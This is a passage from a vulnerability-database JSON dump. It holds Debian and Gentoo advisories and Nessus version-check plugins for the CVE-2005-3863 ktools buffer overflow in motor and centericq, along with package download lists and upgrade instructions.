http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_sparc.deb\n Size/MD5 checksum: 324890 666ad1b0f33565dfbc60e9bd6ae95745\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2006-05-31T00:00:00", "published": "2006-05-31T00:00:00", "id": "DEBIAN:DSA-1083-1:D90D3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00169.html", "title": "[SECURITY] [DSA 1083-1] New motor packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-02-21T01:09:31", "bulletinFamily": "scanner", "description": "Wernfried Haas discovered that centericq, a text-mode multi-protocol instant messenger client, can crash when it receives certain zero length packets and is directly connected to the Internet.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-912.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22778", "published": "2006-10-14T00:00:00", "title": "Debian DSA-912-1 : centericq - denial of service", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-912. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22778);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-3694\");\n script_xref(name:\"DSA\", value:\"912\");\n\n script_name(english:\"Debian DSA-912-1 : centericq - denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wernfried Haas discovered that centericq, a text-mode multi-protocol\ninstant messenger client, can crash when it receives certain zero\nlength packets and is directly connected to the Internet.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=334089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-912\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the centericq package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody1.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 4.20.0-1sarge3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"centericq\", reference:\"4.5.1-1.1woody1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq\", reference:\"4.20.0-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq-common\", reference:\"4.20.0-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq-fribidi\", reference:\"4.20.0-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq-utf8\", reference:\"4.20.0-1sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:28", "bulletinFamily": "scanner", "description": "Mehdi Oudad and Kevin Fernandez discovered a buffer overflow in the ktools library which is used in centericq, a text-mode multi-protocol instant messenger client, which may lead local or remote attackers to execute arbitrary code.", "modified": "2018-07-20T00:00:00", "id": "DEBIAN_DSA-1088.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22630", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1088-1 : centericq - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1088. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22630);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/20 2:17:12\");\n\n script_cve_id(\"CVE-2005-3863\");\n script_bugtraq_id(15600);\n script_xref(name:\"DSA\", value:\"1088\");\n\n script_name(english:\"Debian DSA-1088-1 : centericq - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in centericq, a text-mode multi-protocol\ninstant messenger client, which may lead local or remote attackers to\nexecute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=340959\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1088\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the centericq package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 4.20.0-1sarge4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"centericq\", reference:\"4.5.1-1.1woody2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq\", reference:\"4.20.0-1sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq-common\", reference:\"4.20.0-1sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq-fribidi\", reference:\"4.20.0-1sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"centericq-utf8\", reference:\"4.20.0-1sarge4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:09:22", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200608-27 (Motor: Execution of arbitrary code)\n\n In November 2005, Zone-H Research reported a boundary error in the ktools library in the VGETSTRING() macro of kkstrtext.h, which may cause a buffer overflow via an overly long input string.\n Impact :\n\n A remote attacker could entice a user to use a malicious file or input, which could lead to the crash of Motor and possibly the execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-08-10T00:00:00", "id": "GENTOO_GLSA-200608-27.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22289", "published": "2006-08-30T00:00:00", "title": "GLSA-200608-27 : Motor: Execution of arbitrary code", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-27.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22289);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3863\");\n script_xref(name:\"GLSA\", value:\"200608-27\");\n\n script_name(english:\"GLSA-200608-27 : Motor: Execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-27\n(Motor: Execution of arbitrary code)\n\n In November 2005, Zone-H Research reported a boundary error in the\n ktools library in the VGETSTRING() macro of kkstrtext.h, which may\n cause a buffer overflow via an overly long input string.\n \nImpact :\n\n A remote attacker could entice a user to use a malicious file or input,\n which could lead to the crash of Motor and possibly the execution of\n arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-27\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Motor 3.3.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/motor-3.3.0-r1'\n All motor 3.4.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/motor-3.4.0-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:motor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-util/motor\", unaffected:make_list(\"rge 3.3.0-r1\", \"ge 3.4.0-r1\"), vulnerable:make_list(\"lt 3.4.0-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Motor\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:09:28", "bulletinFamily": "scanner", "description": "Mehdi Oudad and Kevin Fernandez discovered a buffer overflow in the ktools library which is used in motor, an integrated development environment for C, C++ and Java, which may lead local attackers to execute arbitrary code.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-1083.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22625", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1083-1 : motor - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1083. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22625);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-3863\");\n script_xref(name:\"DSA\", value:\"1083\");\n\n script_name(english:\"Debian DSA-1083-1 : motor - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in motor, an integrated development\nenvironment for C, C++ and Java, which may lead local attackers to\nexecute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=368400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1083\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the motor package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.2.2-2woody1.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 3.4.0-2sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:motor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"motor\", reference:\"3.2.2-2woody1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"motor\", reference:\"3.4.0-2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"motor-common\", reference:\"3.4.0-2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"motor-fribidi\", reference:\"3.4.0-2sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- --------------------------------------------------------------------------\r\nDebian Security Advisory DSA 1083-1 security@debian.org\r\nhttp://www.debian.org/security/ Martin Schulze\r\nMay 31st, 2006 http://www.debian.org/security/faq\r\n- --------------------------------------------------------------------------\r\n\r\nPackage : motor\r\nVulnerability : buffer overflow\r\nProblem type : local\r\nDebian-specific: no\r\nCVE ID : CVE-2005-3863\r\nDebian Bug : 368400\r\n\r\nMehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\r\nktools library which is used in motor, an integrated development\r\nenvironment for C, C++ and Java, which may lead local attackers to\r\nexecute arbitrary code.\r\n\r\nFor the old stable distribution (woody) this problem has been fixed in\r\nversion 3.2.2-2woody1.\r\n\r\nFor the stable distribution (sarge) this problem has been fixed in\r\nversion 3.4.0-2sarge1.\r\n\r\nFor the unstable distribution (sid) this problem has been fixed in\r\nversion 3.4.0-6.\r\n\r\nWe recommend that you upgrade your motor package.\r\n\r\n\r\nUpgrade Instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given at the end of this advisory:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 3.0 alias woody\r\n- --------------------------------\r\n\r\n Source archives:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1.dsc\r\n Size/MD5 checksum: 636 932fa3ce87130b09e516ca4419cdd0da\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1.diff.gz\r\n Size/MD5 checksum: 3462 babba5e4b1c2e695836582ce15954812\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2.orig.tar.gz\r\n Size/MD5 checksum: 454423 2ba1c22fb3c76209be185b4cbb7a2bfb\r\n\r\n Alpha architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_alpha.deb\r\n Size/MD5 checksum: 738572 19d012b605af9df5be7920c2d1c14c2b\r\n\r\n ARM architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_arm.deb\r\n Size/MD5 checksum: 653042 d3d0f37780f1fdf1e9a01b0cd804829e\r\n\r\n Intel IA-32 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_i386.deb\r\n Size/MD5 checksum: 549282 522c5ac389fad6cc3fb6b350022b3446\r\n\r\n Intel IA-64 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_ia64.deb\r\n Size/MD5 checksum: 795334 5a7504789d50cdf37581d068df336955\r\n\r\n HP Precision architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_hppa.deb\r\n Size/MD5 checksum: 662582 7d53430905f547c2634186a462ce415a\r\n\r\n Motorola 680x0 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_m68k.deb\r\n Size/MD5 checksum: 517012 5c91f1cd222e656baf4310d42144feb9\r\n\r\n Big endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_mips.deb\r\n Size/MD5 checksum: 529124 d9a7e82738c9ed4eab95de37e7359316\r\n\r\n Little endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_mipsel.deb\r\n Size/MD5 checksum: 521888 8de2e1c0ccbf511f67b337344e9348c8\r\n\r\n PowerPC architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_powerpc.deb\r\n Size/MD5 checksum: 543442 61e434e789e18e8b239fa982812e8ad1\r\n\r\n IBM S/390 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_s390.deb\r\n Size/MD5 checksum: 465874 d08b495f50fb4edfdfd8ea84c3c35ee9\r\n\r\n Sun Sparc architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_sparc.deb\r\n Size/MD5 checksum: 527592 aaf50e919624329bc2c7f53fdb37bb30\r\n\r\n\r\nDebian GNU/Linux 3.1 alias sarge\r\n- --------------------------------\r\n\r\n Source archives:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1.dsc\r\n Size/MD5 checksum: 815 5d26d9fb0c432aa7ea49a22558ee41b4\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1.diff.gz\r\n Size/MD5 checksum: 20178 3edb3f737d0d6c9d29ff6bfc8bebf8ae\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0.orig.tar.gz\r\n Size/MD5 checksum: 572571 c9ff6aade7105a90df11ccfd51592bec\r\n\r\n Architecture independent components:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor-common_3.4.0-2sarge1_all.deb\r\n Size/MD5 checksum: 180060 e10533391309045ebc5c8c6240a66390\r\n\r\n Alpha architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_alpha.deb\r\n Size/MD5 checksum: 400350 1e1cb43ff88df11ab331db1ec2064da6\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_alpha.deb\r\n Size/MD5 checksum: 400456 f2083703d009a1c55b3de99a3a67a0cd\r\n\r\n AMD64 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_amd64.deb\r\n Size/MD5 checksum: 324104 79cf88f5d9132b2ec4d028e49781c12b\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_amd64.deb\r\n Size/MD5 checksum: 324110 ee02473a890ff964499e6f3a571be44b\r\n\r\n ARM architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_arm.deb\r\n Size/MD5 checksum: 515546 c0077e0bf48ce9d4ace9f0b955a37bf1\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_arm.deb\r\n Size/MD5 checksum: 515532 f85e4041f81fd88f7c8406b59be1f7f1\r\n\r\n Intel IA-32 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_i386.deb\r\n Size/MD5 checksum: 329436 bba002e6bd072e2cc8bd216402a46d86\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_i386.deb\r\n Size/MD5 checksum: 329462 e32f51cbfb70a26c91758d3e9efaf11d\r\n\r\n Intel IA-64 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_ia64.deb\r\n Size/MD5 checksum: 467542 e1f4f43dc7d2bc708467c28c929d51ac\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_ia64.deb\r\n Size/MD5 checksum: 467576 c8aa0f65f1663d3b9cda661af9ab8003\r\n\r\n HP Precision architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_hppa.deb\r\n Size/MD5 checksum: 428216 3cbafe2c74ed5f812148cddaf6afb93c\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_hppa.deb\r\n Size/MD5 checksum: 428292 ced41374caa59da300affe46746bba81\r\n\r\n Motorola 680x0 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_m68k.deb\r\n Size/MD5 checksum: 341358 47547f8004245481b2cb0c77d7ac5dc0\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_m68k.deb\r\n Size/MD5 checksum: 341424 2b0b093297255a2617a9e67001a42320\r\n\r\n Big endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_mips.deb\r\n Size/MD5 checksum: 371424 2394101cfd5b979bf76f24dd0c33ff3a\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_mips.deb\r\n Size/MD5 checksum: 371468 eacd6bde371442bd12a91849a2163158\r\n\r\n Little endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_mipsel.deb\r\n Size/MD5 checksum: 369150 53856f0d1135e9a71e638691976fe76a\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_mipsel.deb\r\n Size/MD5 checksum: 369194 824398e12fae38644112d7b07f54f97a\r\n\r\n PowerPC architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_powerpc.deb\r\n Size/MD5 checksum: 344178 dad299ed53a42adad6f8df1902342fe3\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_powerpc.deb\r\n Size/MD5 checksum: 344240 64883e84f2407aa464dfb68558cd2fb4\r\n\r\n IBM S/390 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_s390.deb\r\n Size/MD5 checksum: 298896 51043d25447ba66eeb15c45f8fe8ceb0\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_s390.deb\r\n Size/MD5 checksum: 298904 8b1c71ba4a96d828bd7c04763f31f3a0\r\n\r\n Sun Sparc architecture:\r\n\r\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_sparc.deb\r\n Size/MD5 checksum: 324868 f38dcee356c6d8c5b7c453ca549ff1a7\r\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_sparc.deb\r\n Size/MD5 checksum: 324890 666ad1b0f33565dfbc60e9bd6ae95745\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.3 (GNU/Linux)\r\n\r\niD8DBQFEfTXHW5ql+IAeqTIRAkgNAKC5iWDn6hDn2Jn7zfQ0M+sTf4XkYQCgnaXi\r\n7pIwXjDV8QqMJIHaLfjwDeg=\r\n=XAwf\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-05-31T00:00:00", "published": "2006-05-31T00:00:00", "id": "SECURITYVULNS:DOC:12899", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12899", "title": "[Full-disclosure] [SECURITY] [DSA 1083-1] New motor packages fix arbitrary code execution", 